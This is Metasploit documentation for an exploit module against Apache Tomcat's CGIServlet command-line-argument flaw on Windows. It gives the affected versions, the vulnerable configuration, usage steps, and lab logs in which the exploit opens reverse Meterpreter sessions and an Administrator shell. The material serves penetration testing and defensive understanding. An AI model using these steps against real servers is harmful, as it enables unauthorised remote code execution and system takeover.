adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
30b11edbfbdf12c00a60d87458f82a356d3b37ef
metasploit-gs/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
T

184 lines
6.8 KiB
Markdown
Raw Normal View History

land #11990 windows tomcat cmdlinearguments
2019-07-01 17:29:02 -04:00
## Description
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.
## Vulnerable Application
The following versions of Apache Tomcat on Windows are effected:
* 9.0.0.M1 to 9.0.17
* 8.5.0 to 8.5.39
* 7.0.0 to 7.0.93
Also, the machine needs to enable the `enableCmdLineArguments` option in `conf\web.xml`. For example:
```xml
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>enableCmdLineArguments</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
```
Also:
```xml
<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi/*</url-pattern>
</servlet-mapping>
```
Next, modify the `conf\context.xml` file replacing `<Context>` with `<Context privileged="true">`
Finally, a script needs to be available in the `webapps\ROOT\WEB-INF\cgi` directory. For example:
```
@echo off
echo Content-Type: text/plain
echo.
echo Hello, World!
```
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/windows/http/tomcat_cgi_cmdlineargs`
3. Configure rhosts
4. Configure TARGETURI
5. Set a payload
6. Run the module, you should get a session.
## Scenarios
### Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)
#### Check Method
The check method of the exploit explicitly triggers the bug to verify the vulnerable, therefore it should be accurate. To use it, here is an example:
```
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 172.16.135.141:8080 - The target is vulnerable.
```
#### Code Execution
```
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit
[*] Started reverse TCP handler on 172.16.135.1:4444
[*] Checking if 172.16.135.141 is vulnerable
[*] 172.16.135.141 seems vulnerable, what a good day.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[*] Command Stager progress - 20.86% done (20997/100668 bytes)
[*] Command Stager progress - 27.81% done (27996/100668 bytes)
[*] Command Stager progress - 34.76% done (34995/100668 bytes)
[*] Command Stager progress - 41.72% done (41994/100668 bytes)
[*] Command Stager progress - 48.67% done (48993/100668 bytes)
[*] Command Stager progress - 55.62% done (55992/100668 bytes)
[*] Command Stager progress - 62.57% done (62991/100668 bytes)
[*] Command Stager progress - 69.53% done (69990/100668 bytes)
[*] Command Stager progress - 76.48% done (76989/100668 bytes)
[*] Command Stager progress - 83.43% done (83988/100668 bytes)
[*] Command Stager progress - 90.38% done (90987/100668 bytes)
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 172.16.135.141
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.141:51982) at 2019-06-18 15:26:54 -0500
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
```
### Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)
```
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[*] Command Stager progress - 20.86% done (20997/100668 bytes)
[*] Command Stager progress - 27.81% done (27996/100668 bytes)
[*] Command Stager progress - 34.76% done (34995/100668 bytes)
[*] Command Stager progress - 41.72% done (41994/100668 bytes)
[*] Command Stager progress - 48.67% done (48993/100668 bytes)
[*] Command Stager progress - 55.62% done (55992/100668 bytes)
[*] Command Stager progress - 62.57% done (62991/100668 bytes)
[*] Command Stager progress - 69.53% done (69990/100668 bytes)
[*] Command Stager progress - 76.48% done (76989/100668 bytes)
[*] Command Stager progress - 83.43% done (83988/100668 bytes)
[*] Command Stager progress - 90.38% done (90987/100668 bytes)
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2019-06-24 20:44:19 -0400 %SystemDrive%
100777/rwxrwxrwx 73802 fil 2019-06-24 20:44:19 -0400 dKASF.exe
100777/rwxrwxrwx 67 fil 2019-06-20 21:52:49 -0400 example.bat
100777/rwxrwxrwx 69 fil 2019-06-24 15:15:13 -0400 test.bat
meterpreter > sysinfo
Computer : WIN-EDKFSE5QPAB
OS : Windows 2012 (Build 9200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME: "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built: Aug 2 2017 21:35:49 UTC
Server number: 8.5.20.0
OS Name: Windows Server 2012
OS Version: 6.2
Architecture: amd64
JVM Version: 1.8.0_211-b12
JVM Vendor: Oracle Corporation
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>
```
Reference in New Issue Copy Permalink